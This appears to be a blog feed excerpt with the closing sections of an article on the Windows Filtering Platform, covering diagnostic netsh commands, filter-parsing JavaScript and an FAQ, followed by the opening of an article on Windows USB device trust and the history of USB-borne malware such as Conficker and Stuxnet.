The structural shape of the BFE EoP CVE class. Is the BFE elevation-of-privilege CVE class -- CWE-415 in 2023 [@nvd-2023-29368], CWE-190 in 2024 [@nvd-2024-38034], no public impossibility theorem either way -- tail risk inherent to the platform's policy-from-user-mode-to-kernel design, or is it addressable by an architectural fix (HVCI hardening on fwpkclnt.sys callout paths, bounded ABI contracts on the Fwpm* surface, Rust-in-Windows-kernel for new callout drivers)? The honest answer is that this is open. The integer-overflow / double-free class is the canonical attack surface of any user-to-kernel ABI; the question is whether Microsoft commits to a structural fix or to tail-risk-mitigation-plus-patching.

eBPF for Windows production readiness. Does it displace WFP for new kernel-mode network filters, or does it stay adjacent? The v1.1.0 release in March 2026 was framed as "first stable" while still labelled Pre-release [@ebpf-releases]. The same release added hard/soft permit verdicts to its accept and bind hooks, explicitly mirroring FWPS_RIGHT_ACTION_WRITE in WFP [@ebpf-releases]. That borrowing is a tell -- the project is converging on the WFP arbitration semantics, which suggests the long-term picture is "eBPF for Windows alongside WFP" rather than "eBPF replaces WFP." The market answer is unsettled.

Windows Defender Application Guard's egress-isolation pattern after WDAG deprecation. WDAG for Edge used a WFP-backed egress-isolation pattern to route browsing-container traffic out of an isolated network compartment. The WDAG product surface is being phased out -- Microsoft has documented that "Microsoft Defender Application Guard... is deprecated for Microsoft Edge for Business and will no longer be updated. Starting with Windows 11, version 24H2, Microsoft Defender Application Guard... is no longer available" [@mdag-deprecation]. The pattern's future on Windows -- in containers, virtualization-based security profiles, or some successor -- is undocumented as of the time of writing. Treat this paragraph as conjectural until Microsoft publishes a successor pattern.

NIC offload composability with kernel firewalls. As more pipeline elements move into the NIC -- TSO, LSO, GRO/GSO, URO [@uro], TLS offload, IPsec offload, RDMA, VxLAN, GENEVE -- the assumption that every packet flows past every WFP layer weakens. A callout that registers at FWPM_LAYER_INBOUND_TRANSPORT_V4 may never see a packet whose transport-layer work happened entirely on the NIC. The kernel-firewall design that grew up assuming software ground truth has to renegotiate that assumption release by release. NDIS 6.89's URO is the most recent example [@ndis-689]; there will be more.

"Open" in this section means engineering-open, not theory-open. There is no published impossibility theorem stating that WFP cannot be made provably safe against integer-overflow elevation-of-privilege, or that a kernel firewall cannot inspect encrypted traffic with a key-disclosure protocol, or that NIC offloads cannot be composed with kernel-side filters by sharing flow state. The practical question, in every case, is whether Microsoft and the broader Windows community invest in the structural fix or settle for tail-risk-mitigation plus patching. The answer in 2026 is "mostly the latter."

Six open problems. Now, how do you actually use the platform that has been the subject of this article?

10. The Four Ways You Touch WFP

Whether you are an administrator, a detection engineer, or a kernel driver writer, there are four canonical surfaces you actually touch. Here is the field guide.

The diagnostic surface: `netsh wfp`

Wikipedia's WFP page notes the introduction date: "Starting with Windows 7, the netsh command can diagnose of the internal state of WFP" [@wiki-wfp]. The canonical incident-response triplet is three commands long.

Note: Run these three commands, in this order, before doing anything else when a Windows host shows network-filtering behaviour you cannot explain:

```text
netsh wfp show state file=state.xml
netsh wfp show filters file=filters.xml
netsh wfp capture start file=C:\Temp\wfp.cab
:: reproduce the issue
netsh wfp capture stop
```

state.xml is the platform's current rendered configuration: every provider, sublayer, filter, and callout currently registered. filters.xml lists every filter, including effective weight and action. The .cab from netsh wfp capture is the ETW-and-state bundle that goes onto a Microsoft Support case. The netsh wfp family has been around since Windows 7 [@wiki-wfp]; it has not had a major redesign since.

A state.xml from netsh wfp show state is an XML document with one <item> per filter. Each item carries a <displayData> element with a name and description, the layer GUID, the sublayer GUID, the weight, and the action. Reading one is a matter of pattern recognition rather than parsing. The next snippet walks the structure on a hand-pasted fragment.

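```javascript
// A real-world 'netsh wfp show state' output contains many <item> elements
// inside <filters>. The fragment below is a single filter, hand-pasted from
// a 'show state' XML dump.
const xmlFragment = `
<item>
  <filterKey>{deadbeef-1111-2222-3333-444455556666}</filterKey>
  <displayData>
    <name>EDR-vendor outbound TCP inspect</name>
    <description>Vendor X deep-inspection callout filter</description>
  </displayData>
  <layerKey>FWPM_LAYER_ALE_AUTH_CONNECT_V4</layerKey>
  <subLayerKey>{a0192d10-aaaa-bbbb-cccc-1234567890ab}</subLayerKey>
  <weight><type>FWP_UINT64</type><uint64>0x4000000000000064</uint64></weight>
  <action><type>FWP_ACTION_CALLOUT_INSPECTION</type></action>
</item>`;

// Minimal regex-based reader for the five fields. The tag names assume the
// usual 'show state' layout; a production tool should use a real XML parser.
function readFilter(xml) {
  const text = (re) => (xml.match(re) || [])[1];
  return {
    name: text(/<name>([^<]*)<\/name>/),
    layer: text(/<layerKey>([^<]*)<\/layerKey>/),
    subLayer: text(/<subLayerKey>([^<]*)<\/subLayerKey>/),
    weight: text(/<uint64>([^<]*)<\/uint64>/),
    action: text(/<action>\s*<type>([^<]*)<\/type>/),
  };
}

console.log(readFilter(xmlFragment));
// {
//   name: 'EDR-vendor outbound TCP inspect',
//   layer: 'FWPM_LAYER_ALE_AUTH_CONNECT_V4',
//   subLayer: '{a0192d10-aaaa-bbbb-cccc-1234567890ab}',
//   weight: '0x4000000000000064',
//   action: 'FWP_ACTION_CALLOUT_INSPECTION'
// }
```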

Five fields: name, layer, sublayer, weight, action. That is what every WFP filter resolves to. Reading a hundred of them takes an afternoon.
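Once filters are reduced to those five fields, the next question is usually which filter is evaluated first. A minimal sketch, assuming hypothetical filter records and a hypothetical helper named `orderForArbitration`: group by sublayer, then sort by descending weight, which is the order WFP walks filters within a sublayer. Weights are 64-bit values, so the comparison uses `BigInt` rather than JavaScript numbers.

```javascript
// Hypothetical records, already reduced to the fields that matter here.
const filters = [
  { name: 'vendor inspect', subLayer: '{aaaa}', weight: '0x4000000000000064', action: 'FWP_ACTION_CALLOUT_INSPECTION' },
  { name: 'vendor block', subLayer: '{aaaa}', weight: '0x4000000000000065', action: 'FWP_ACTION_BLOCK' },
  { name: 'default permit', subLayer: '{bbbb}', weight: '0x0000000000000001', action: 'FWP_ACTION_PERMIT' },
];

// As doubles, the two vendor weights collapse to the same value, which is
// why the sort below compares BigInt values instead.
const collapsed = Number(filters[0].weight) === Number(filters[1].weight);
console.log(collapsed); // true

// Group filters by sublayer and sort each group from highest to lowest weight.
function orderForArbitration(list) {
  const bySubLayer = new Map();
  for (const f of list) {
    if (!bySubLayer.has(f.subLayer)) bySubLayer.set(f.subLayer, []);
    bySubLayer.get(f.subLayer).push(f);
  }
  for (const group of bySubLayer.values()) {
    group.sort((a, b) => {
      const wa = BigInt(a.weight);
      const wb = BigInt(b.weight);
      return wa === wb ? 0 : wa > wb ? -1 : 1;
    });
  }
  return bySubLayer;
}

const ordered = orderForArbitration(filters);
console.log(ordered.get('{aaaa}').map((f) => f.name));
// [ 'vendor block', 'vendor inspect' ]
```

The sketch orders filters only; it does not model how sublayer results are combined into a final verdict.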

The administrative surface: `wf.msc`

The Microsoft Management Console snap-in is the surface most Windows users have actually clicked. Every rule created in wf.msc is translated by the MpsSvc service into a WFP filter and pushed into the BFE's MPSSVC provider sublayer over RPC, and from there into TCPIP.SYS in the kernel [@forshaw-2021]. The UI exposes a small fraction of the filter properties WFP actually models; advanced rule attributes (per-AppContainer SID, per-package family name, per-service hardening) live in the underlying filter only.

The networking surface: `New-NetNat` and Hyper-V NAT switches

The PowerShell cmdlet New-NetNat "creates a Network Address Translation (NAT) object that translates an internal network address to an external network address" [@netnat]. Each NAT object materialises as a set of WFP filters that perform the translation. Windows containers use the same machinery for their default NAT switch. The Get-NetNat, Remove-NetNat, and related cmdlets in the NetNat PowerShell module are the entry point.

The driver surface: writing a WFP callout

The WDK's "Introduction to Windows Filtering Platform Callout Drivers" page is the entry point for kernel-mode writers [@wfp-callouts]. The reference sample, WFPSampler, lives in the microsoft/Windows-driver-samples repository under network/trans/WFPSampler. The sample's description: "The WFPSampler sample driver is a sample firewall. It has a command-line interface which allows adding filters at various WFP layers with a wide variety of conditions. Additionally it exposes callout functions for injection, basic action, proxying, and stream inspection" [@wfpsampler]. The sample ships five components: WFPSampler.Exe, WFPSamplerService.Exe, WFPSamplerCalloutDriver.Sys, WFPSamplerProxyService.Exe, and the two libraries WFPSampler.Lib / WFPSamplerSys.Lib. If you install WFPSampler and the installer refuses to register without a reboot prompt, the README documents a workaround: run RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 131 wfpsampler.inf (note the 131), and RunDLL32 setupapi.dll,InstallHinfSection DefaultInstall 132 wfpsampler.inf for the corresponding uninstall codepath [@wfpsampler]. The 131/132 flags suppress the reboot prompt for the in-tree sample driver.

A WFP callout driver that originates kernel-mode network I/O should pair with Winsock Kernel.

"Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. WSK is the modern replacement for TDI as the kernel-mode sockets API on Windows Vista and later. Microsoft's WSK introduction makes the split explicit: "Filter drivers should implement the Windows Filtering Platform on Windows Vista, and TDI clients should implement WSK" [@wsk-intro]. WFP filters traffic. WSK opens sockets from inside the kernel. The two interfaces are siblings. Before writing a callout driver, ask: does the policy need per-packet kernel visibility, or would a user-mode service that consumes ETW events from `Microsoft-Windows-WFP` and the firewall's ETW providers be enough? Most logging and detection use cases are answered by ETW. A callout driver is justified when you need to *act on* traffic (drop, redirect, modify, inspect payload), not just *observe* it. The kernel attack surface that comes with a callout, documented in Section 8, is now yours to share once you ship.

The detection-engineering surface lives in ETW. The two providers to know are Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall With Advanced Security. Names are not enough to do the full subject justice; the cross-reference footer below points at the dedicated ETW article in this series.

You now have a mental map of every place WFP touches a Windows host -- under the firewall UI, under IPsec, under WinNAT, under the Hyper-V vSwitch, under Defender for Endpoint, under every EDR. The FAQ disarms the last eight misconceptions.

11. Frequently Asked Questions

Is WFP the same thing as the Windows Firewall?

No. WFP is the platform; the Windows Firewall (WFAS, service name `MpsSvc`) is one consumer of it. Microsoft's start page makes the relationship explicit: "Windows Firewall with Advanced Security (WFAS) is implemented using WFP" [@wfp-start]. The Base Filtering Engine service (`bfe`) hosts the user-mode side of WFP and accepts policy from `MpsSvc` over RPC [@forshaw-2021]. Two user-mode services and a kernel-mode classification path, one platform.

Is `fwpkclnt.sys` the WFP filter engine?

No. `fwpkclnt.sys` is the kernel-mode WFP client and export driver. Callout drivers link against `fwpkclnt.lib`, whose in-memory form is `fwpkclnt.sys` [@wfp-arch]. The classification path -- the code that walks sublayers and filters -- runs primarily inside `NETIO.SYS`, as Forshaw documents in his Project Zero post [@forshaw-2021]. The shorthand "`fwpkclnt.sys` is the filter engine" is common online and incorrect.

Is BFE the same service as `MpsSvc`?

No. BFE (service name `bfe`) is the Base Filtering Engine -- the platform service that controls WFP and plumbs configuration to other modules, including IPsec keying [@wfp-about]. `MpsSvc` is the Windows Defender Firewall service. `MpsSvc` depends on `bfe`; the dependency is not reciprocal [@forshaw-2021].

Can a WFP callout read TLS 1.3 or QUIC payloads?

No. WFP callouts see plaintext only for non-IPsec, non-TLS payloads, or for IPsec traffic where the kernel holds the keys. TLS 1.3 and QUIC are end-to-end encrypted from a callout's perspective; the keys live in user-mode TLS libraries inside the application. Microsoft's own Defender for Endpoint Network Protection documentation acknowledges the limit: "Blocking FQDNs in non-Microsoft browsers requires that QUIC and Encrypted Client Hello be disabled in those browsers" [@mde-netprot]. Section 8 calls this the encryption ceiling.

Is SecureNAT the Windows-host NAT built on WFP?

No. SecureNAT is an ISA Server / Forefront Threat Management Gateway concept, retired with TMG. The modern Windows-host NAT on WFP is **WinNAT**, managed by the `New-NetNat` PowerShell cmdlet [@netnat]. Windows containers use WinNAT for their default NAT switch. The original input scope that informed this article erroneously referenced "SecureNAT" as a WFP consumer; the focus-premise audit corrected it to WinNAT before drafting began.

Does WSK stand for "Windows Sockets Kernel"?

No. WSK is **Winsock Kernel**. Microsoft Learn's introduction is unambiguous: "Winsock Kernel (WSK) is a kernel-mode Network Programming Interface (NPI)" [@wsk-intro]. The two-letter prefix is "Winsock," the original Windows Sockets API brand, not "Windows Sockets."

Is CVE-2024-21318 the 2024 WFP elevation-of-privilege vulnerability?

No. CVE-2024-21318 is a Microsoft SharePoint Server deserialization remote code execution vulnerability, unrelated to the Base Filtering Engine. The 2024 WFP elevation-of-privilege vulnerability is **CVE-2024-38034**: a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. The article's source-verification stage flagged the original scope's CVE attribution error before drafting; the article tracks CVE-2024-38034 and CVE-2023-29368 as the two anchor BFE CVEs.

Can WFP block QUIC?

Only at the 5-tuple level (IP, port, protocol) before or after a connection establishes. Once a QUIC connection is up, the encryption ceiling applies and the kernel has no key for the encrypted payload [@mde-netprot]. FQDN-level blocking of QUIC over Network Protection requires QUIC to be disabled in the browser, per Microsoft's own troubleshooting guide [@mde-netprot]. Deep inspection of QUIC content from the kernel is not possible with WFP alone.

See also. The Microsoft-Windows-WFP and Microsoft-Windows-Windows Firewall ETW providers are how detection-engineering teams see WFP from outside the kernel; the dedicated ETW article in this series goes deeper on the provider names, manifests, and parsing. The Antimalware Scan Interface (AMSI) sits on the process-side path that complements WFP's network-side path; the two are siblings, not substitutes. And the \Device\Ipfilterdriver device object that this article retired in Section 3 lives in the Windows Object Manager namespace, whose architecture is the subject of the Object Manager article in this series.

Plug and Trust: How Windows Decides What to Do When You Plug In a USB Device

noreply@paragmali.com (Parag Mali) — Mon, 11 May 2026 00:00:00 GMT

Plugging a USB device into Windows is the single most-trusted action a user routinely performs on an operating system that verifies every byte of code it loads. In a few hundred milliseconds (typically 200-300 ms when the driver is already in the local store; longer on a first-time Windows Update fetch), Windows executes ten or eleven kernel-mode operations (eleven for composite devices) and trusts about 256 bytes of self-described descriptors to decide which driver runs. This article walks that pipeline end-to-end on Windows 11 25H2: the descriptor parser surface, the Plug-and-Play rank algorithm, Kernel-Mode Code Signing and Kernel DMA Protection, BadUSB and Thunderclap, and the five structural limits Windows cannot close without breaking USB compatibility.

1. The Thirty-Second Trust Decision

A user plugs a USB-C thumb drive into a Windows 11 25H2 corporate laptop at 10:42:17 in the morning. Roughly a quarter-second later, the operating system has executed ten or eleven kernel-mode operations (eleven for composite devices) to decide what kind of device it is and which driver to load. The "quarter-second" is editorial framing, not a spec-mandated deadline. The only piece USB-IF actually fixes is the 100 ms attach-debounce window T_ATTDB defined in the USB 2.0 specification §7.1.7.3 (Connect and Disconnect Signaling) [@usb-2-0-spec]; the rest of the budget is implementation-dependent. A typical USB 2.0 thumb drive on a 2024-era xHCI controller, with the function driver already in the local store, lands in the 200-300 ms range. A first-time Windows Update fetch, a slow descriptor read, or a multi-configuration device can stretch it to a second or more. None of those eleven operations consulted the user. None of them verified a cryptographic signature from the peripheral. The entire decision rests on roughly 256 bytes of self-described metadata that the device handed the host on insertion.

Here is the sequence, in the order Windows executes it:

Port-status-change interrupt fires on the xHCI host controller.
The host controller's driver issues a port reset.
Downstream-port speed detection runs: Low, Full, High, Super, or Super+ Speed.
The hub addresses the device at the default address (zero) and asks for the first eight bytes of the USB_DEVICE_DESCRIPTOR.
SET_ADDRESS assigns a non-default bus address.
The hub fetches the full eighteen-byte device descriptor.
The hub fetches the configuration descriptor, including all interface and endpoint sub-descriptors.
If the descriptor indicates a composite device, the generic parent splits it into per-interface child devices.
The Plug-and-Play manager synthesizes hardware IDs and compatible IDs from the descriptor fields.
The driver-store INF database is searched with a rank-scored matching algorithm; the chosen driver is verified against the Kernel-Mode Code Signing policy.
The class driver attaches to the new device node and begins serving I/O.

Microsoft's own architecture documentation confirms the pipeline: the xHCI host controller driver, the host-controller extension, and the hub driver -- usbhub3.sys, the binary that enumerates devices and creates physical device objects -- are all KMDF-based [@ms-usb-3-0-stack]. The rank-scored INF match comes straight from the Plug-and-Play manager's documented behavior [@ms-pnp-rank]. The signature check is governed by the same Kernel-Mode Code Signing policy that has gated every kernel driver since 64-bit Windows Vista shipped in 2007 [@ms-kmcs].

Key idea: Ten or eleven kernel-mode operations (eleven for composite devices). Zero human decisions. Roughly 256 bytes of self-described metadata. That is the size of the trust gap between physical insertion and the moment a class driver begins reading and writing data inside the Windows kernel.

The load-bearing primitive in that pipeline is the USB descriptor: a small block of bytes the peripheral emits when asked, naming what kind of device it claims to be, who claims to have made it, and what features it claims to support. Windows must trust those bytes to choose a driver. There is no out-of-band channel to verify them. There is no signature on the descriptor itself.

This article is a walk through what Windows does verify, what it cannot verify, and where the gap lives. The trust posture is older than USB itself, and the failure modes are older than Windows 2000. We will start with the inheritance.

2. The Pre-USB Removable-Media Trust Model

A user in Lahore inserts a 5.25-inch floppy into an IBM PC clone. Whatever 512 bytes sit at sector zero of that diskette will execute as part of the operating-system boot path before any code that came with the machine runs. The trust model Windows still uses for USB peripherals in 2026 was carved into silicon that year.

The IBM PC's boot ROM, by design, copied sector zero of whatever bootable medium was present into memory and jumped to it. That contract -- inserted media is trusted media -- shipped in 1981 and was demonstrated as catastrophic within five years. The Brain virus appeared in 1986 [@wiki-brain]; Stoned in 1987 [@wiki-stoned]; Michelangelo was first discovered on 3 February 1991 in Australia and produced its global panic on March 6, 1992 [@wiki-michelangelo]. Each one used the boot-sector primitive that Wikipedia's standard reference on boot sectors documents [@wiki-bootsector]. The Brain virus shipped with a literal copyright notice in the boot sector, naming the Alvi brothers and giving an address in Lahore: a piece of self-documenting malware authored when virus authors did not yet expect to be prosecuted. The address-and-phone-number pattern is a recurring forensic curiosity from the 1986-1990 era.

A USB descriptor is a small, structured block of bytes that a USB peripheral returns when the host asks for it. There are five standard descriptor types in the USB 1.0 specification (device, configuration, string, interface, endpoint) and several class-specific descriptors (HID report descriptors, audio control units, mass-storage CSW formats) layered on top. The device descriptor names a vendor ID, a product ID, a device class, and the maximum packet size for the default control pipe. The string descriptors carry the human-readable manufacturer, product, and serial-number text that Windows displays in Device Manager and that Defender for Endpoint per-serial allow-lists key on. The host has no out-of-band channel to verify any of these fields; the peripheral's self-declaration *is* its identity for the purpose of driver selection.
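To make the size of that self-declaration concrete, here is a minimal sketch that decodes the eighteen-byte standard device descriptor into its named fields. The field layout follows the USB specification; the sample bytes, including VID 0x1234 and PID 0xABCD, are made-up placeholders, and `parseDeviceDescriptor` is an illustrative name rather than any Windows API.

```javascript
// Decode the 18-byte standard device descriptor. Multi-byte fields are
// little-endian on the wire.
function parseDeviceDescriptor(bytes) {
  if (bytes.length < 18) throw new Error('device descriptor is 18 bytes');
  const view = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  const hex4 = (n) => n.toString(16).toUpperCase().padStart(4, '0');
  return {
    bLength: view.getUint8(0),
    bDescriptorType: view.getUint8(1), // 0x01 = DEVICE
    bcdUSB: hex4(view.getUint16(2, true)),
    bDeviceClass: view.getUint8(4),
    bDeviceSubClass: view.getUint8(5),
    bDeviceProtocol: view.getUint8(6),
    bMaxPacketSize0: view.getUint8(7), // last field in the first 8 bytes
    idVendor: hex4(view.getUint16(8, true)),
    idProduct: hex4(view.getUint16(10, true)),
    bcdDevice: hex4(view.getUint16(12, true)),
    iManufacturer: view.getUint8(14), // string-descriptor indexes
    iProduct: view.getUint8(15),
    iSerialNumber: view.getUint8(16),
    bNumConfigurations: view.getUint8(17),
  };
}

// Placeholder descriptor for a hypothetical USB 2.0 device.
const sample = Uint8Array.from([
  0x12, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x40,
  0x34, 0x12, 0xcd, 0xab, 0x00, 0x01, 0x01, 0x02, 0x03, 0x01,
]);

const descriptor = parseDeviceDescriptor(sample);
console.log(descriptor.idVendor, descriptor.idProduct, descriptor.bcdUSB);
// 1234 ABCD 0200
```

Every value in the returned object is whatever the peripheral chose to send; nothing in the decode step can distinguish an honest descriptor from a forged one.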

Microsoft inherited the contract from DOS and refined it. AutoRun, which the Wikipedia reference documents verbatim, "was introduced in Windows 95 to ease application installation for non-technical users and reduce the cost of software support calls ... a feature of Windows Explorer (actually of the shell32 dll) ... enables media and devices to launch programs by use of command listed in a file called autorun.inf, stored in the root directory of the medium" [@wiki-autorun]. Windows 95 RTMed on August 24, 1995. The original design intent was CD-ROM application installation -- read-only optical media, written once at the factory, shipped in a sealed jewel case. The trust assumption matched the physical reality.

Four months after Windows 95 shipped, the USB Implementers Forum was formed. Wikipedia preserves the date and the founder list verbatim: "The USB-IF was initiated on December 5, 1995, by the group of companies that was developing USB ... Compaq, Digital Equipment Corporation, IBM, Intel, Microsoft, NEC and Nortel" [@wiki-usbif]. Microsoft was a co-author of the contract that would govern peripheral trust on every Windows machine for the next thirty years.

A Vendor ID is a 16-bit number that the USB Implementers Forum sells to a device manufacturer for a one-time \$6,000 fee [@wiki-usbif]. A Product ID is a 16-bit number the manufacturer assigns to a specific product within their VID space. The pair forms the most-specific hardware ID Windows uses to select a USB driver, in the form `USB\VID_xxxx&PID_xxxx`. The USB-IF Vendor-ID fee is the only economic gate between an arbitrary firmware author and a "trusted" identity in Windows's driver-store search; it is not a cryptographic gate of any kind.
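The identifier strings can be sketched directly from the descriptor fields. The example below follows the `USB\VID_xxxx&PID_xxxx` form quoted above plus the revision-qualified and class-based forms that Microsoft documents for single-interface USB devices, as best I understand them. The `usbIds` helper and the VID/PID values are hypothetical; the class triple 0x08/0x06/0x50 is the mass-storage Bulk-Only Transport combination.

```javascript
// Upper-case, zero-padded hex, as the identifier strings use.
const hex = (n, width) => n.toString(16).toUpperCase().padStart(width, '0');

// Build the ID lists from most specific to least specific.
function usbIds({ idVendor, idProduct, bcdDevice, cls, subCls, proto }) {
  const vidPid = `USB\\VID_${hex(idVendor, 4)}&PID_${hex(idProduct, 4)}`;
  const classId = `USB\\Class_${hex(cls, 2)}`;
  const subClassId = `${classId}&SubClass_${hex(subCls, 2)}`;
  return {
    hardwareIds: [`${vidPid}&REV_${hex(bcdDevice, 4)}`, vidPid],
    compatibleIds: [`${subClassId}&Prot_${hex(proto, 2)}`, subClassId, classId],
  };
}

// Placeholder thumb drive: made-up VID/PID, mass-storage class codes.
const ids = usbIds({
  idVendor: 0x1234,
  idProduct: 0xabcd,
  bcdDevice: 0x0100,
  cls: 0x08,
  subCls: 0x06,
  proto: 0x50,
});

console.log(ids.hardwareIds);
// [ 'USB\\VID_1234&PID_ABCD&REV_0100', 'USB\\VID_1234&PID_ABCD' ]
console.log(ids.compatibleIds);
// [ 'USB\\Class_08&SubClass_06&Prot_50', 'USB\\Class_08&SubClass_06', 'USB\\Class_08' ]
```

Every input to `usbIds` comes from bytes the device supplied, so a peripheral that wants a particular driver only has to report the numbers that driver's INF matches.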

The first complete USB specification followed quickly. Wikipedia's USB article puts it verbatim: "Designed January 1996 ... Produced Since May 1996 ... Designer: Compaq, DEC, IBM, Intel, Microsoft, NEC, Nortel" [@wiki-usb]. USB 1.0 defined the five standard descriptors, the bus enumeration handshake, and -- the load-bearing architectural choice -- the device-class architecture in which the peripheral declares its own class, subclass, and protocol. A USB keyboard reports bInterfaceClass=0x03 (HID) because it says it is a keyboard. The host has no other source of that fact.

Three years later, the protocol's storage cousin arrived. The USB Mass Storage Class Bulk-Only Transport, Revision 1.0, was published in September 1999 [@usb-massbulk-pdf]. That specification is the protocol on which Windows 2000's usbstor.sys and every modern thumb-drive driver are built. It defines a stripped-down SCSI command set tunneled over USB bulk endpoints; it does not define any peripheral-authentication mechanism.

The inheritance is structural. AutoRun shipped in 1995, designed for write-once optical media in a sealed jewel case. Windows 2000 extended AutoRun to every mounted volume -- including the new USB thumb-drive class. A 1995 trust model for trusted physical media now protected read-write USB sticks anyone could carry between machines. Forty years later, that line in the lineage has not been redrawn.

```mermaid
timeline
    title Pre-USB removable-media trust, 1981 to 2000
    1981 : IBM PC ships : Boot ROM jumps to sector 0 of inserted media
    1986 : Brain virus : Lahore : First in-the-wild boot-sector virus
    1987 : Stoned virus : Boot-sector class established
    1991 : Michelangelo discovered : 3 February 1991, Australia
    1992 : Michelangelo media panic : Trigger date 6 March 1992
    1995 : Windows 95 RTM : AutoRun introduced for CD-ROM installers
    1995 : USB-IF founded December 5 : Seven-company consortium
    1996 : USB 1.0 designed January : Device-class architecture: peripheral declares its own class
    1999 : USB Mass Storage 1.0 : Bulk-Only Transport specification
    2000 : Windows 2000 usbstor.sys : AutoRun extends to USB volumes
```

Timeline sources, in row order: [@wiki-bootsector] for the IBM PC boot-sector contract; [@wiki-brain], [@wiki-stoned], and [@wiki-michelangelo] for the named-virus lineage and the 1992-not-1991 Michelangelo panic date; [@wiki-autorun] for the Windows 95 / AutoRun introduction; [@wiki-usbif] for the USB-IF founding date and seven-company consortium; [@wiki-usb] for the USB 1.0 January 1996 design date and the device-class architecture; [@usb-massbulk-pdf] for the USB Mass Storage Class Bulk-Only Transport 1.0 specification.

If the trust model is forty years old, the failure modes must be older than USB. They are. The first fifteen years of USB on Windows were a transport in search of a security model, and the bill came due in two famous worms.

3. The Pre-Hardening Era, 1996 to 2010

For its first fifteen years on Windows, USB was a transport in search of a security model. Drivers were unsigned on 32-bit. AutoRun was on. Descriptors were trusted. The bill was paid in two worms.

The Generation-1 stack was a USB 1.1 design retrofitted onto Windows 95 OSR2.1 in 1997 and refined for Windows 2000. The host-controller drivers (Usbuhci.sys, Usbohci.sys, and later Usbehci.sys for USB 2.0 high speed) sat below a single port driver, Usbport.sys; the hub driver was usbhub.sys. Microsoft's USB-3.0 architecture page documents the older 2.0 stack as the predecessor of the modern KMDF chain [@ms-usb-3-0-stack]. On 32-bit Windows, none of these binaries needed a Microsoft-trusted signature to load.

Windows 2000 added usbstor.sys, the function driver implementing the USB Mass Storage Class Bulk-Only protocol [@usb-massbulk-pdf]. Suddenly a thumb drive was a first-class read-write filesystem the user could carry between machines, and AutoRun -- a 1995 contract for CD-ROM application installers -- applied to it. The original autorun.inf was a sensible primitive. Insert a sealed jewel case, run the vendor's setup wizard, get a new application. Extending the contract to user-writable USB sticks broke the cardinal assumption: that the media's content was set by a trustworthy party at the factory and could not be modified in the field.

KMCS is the Windows policy that requires every kernel-mode binary -- every `.sys` file Windows loads into ring zero -- to carry a digital signature chaining to a Microsoft-trusted root certificate. KMCS has been mandatory on 64-bit Windows since Vista shipped in 2007. Microsoft Learn documents the signing-by-version matrix, the SHA-256 algorithm requirement, and the post-2016 narrowing of the cross-signed-CA exception. KMCS prevents an attacker from loading an arbitrary `.sys` file into the kernel. It does not, by itself, prevent an attacker from feeding malicious *data* to an already-signed `.sys` file.

The Conficker worm, first detected in November 2008, industrialized the AutoRun-on-USB era. Wikipedia summarizes its origin verbatim: "first detected in November 2008 ... uses flaws in Windows OS software (MS08-067 / CVE-2008-4250) and dictionary attacks on administrator passwords to propagate ... The first variant of Conficker, discovered in early November 2008, propagated through the Internet by exploiting a vulnerability in a network service (MS08-067)" [@wiki-conficker]. Conficker rode two completely separate vectors: a Server Service vulnerability (a path-canonicalization overflow in srvsvc.dll reachable over SMB on TCP 445 and via NetBIOS over TCP/IP on TCP 139) over the network [@nvd-cve-2008-4250], and autorun.inf-driven AutoPlay execution on inserted USB drives. The two propagation paths are independent and worth distinguishing.

Note: MS08-067 / CVE-2008-4250 is the Server Service RPC-over-SMB vulnerability (reachable on TCP 445 and via NetBIOS over TCP/IP on TCP 139) that gave Conficker its network propagation. NIST's NVD entry characterises the surface verbatim as "a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka 'Server Service Vulnerability'" [@nvd-cve-2008-4250]. The USB-side propagation came from autorun.inf on inserted thumb drives, not from MS08-067. The two vectors share a worm but not a vulnerability. Press accounts that conflate them tend to overstate what closing MS08-067 actually did to USB-borne malware in 2008.

Stuxnet followed in 2010. Wikipedia's article puts the timing and the vector verbatim: "Stuxnet is a malicious computer worm first uncovered on 17 June 2010 ... It is typically introduced to the target environment via an infected USB flash drive, thus crossing any air gap" [@wiki-stuxnet]. The technical primitive that let Stuxnet cross air gaps onto Iranian centrifuge-control PCs was CVE-2010-2568, a flaw in the Windows Shell's processing of .LNK shortcut icons. NIST's National Vulnerability Database entry preserves the verbatim characterization: "Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems" [@nvd-cve-2010-2568]. Microsoft Security Bulletin MS10-046 shipped the patch [@ms10-046].

Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010. -- NIST, National Vulnerability Database, CVE-2010-2568 [@nvd-cve-2010-2568]

Patch Tuesday, February 2011 closed the AutoRun pipeline outside Windows 7. Brian Krebs covered the rollout verbatim at the time: "Microsoft also issued an update that changes the default behavior in Windows when users insert a removable storage device, such as a USB or thumb drive. This update effectively disables 'autorun,' a feature of Windows that has been a major vector for malware over the years. Microsoft released this same update in February 2009, but it offered it as an optional patch. The only thing different about the update this time is that it is being offered automatically to users who patch through Windows Update or Automatic Update" [@krebs-feb2011]. The update originally shipped as an optional Windows-7-era fix; Microsoft made it automatic for XP, Vista, Server 2003, and Server 2008 in February 2011.

Six months later, the descriptor-parser surface itself was named for the first time. Andy Davis of NCC Group gave "USB -- Undermining Security Barriers" at Black Hat USA 2011. The verified NCC Group publication archive carries the talk and a one-line abstract [@ncc-davis-2011]. Davis fuzzed USB descriptors against the Windows kernel parser and demonstrated that the parser itself -- not the application layer, not AutoRun -- was kernel-mode adversarial-input attack surface. The talk did not name a single bug; it named a class of bugs: anything that parses adversarial bytes in ring zero in a memory-unsafe language.

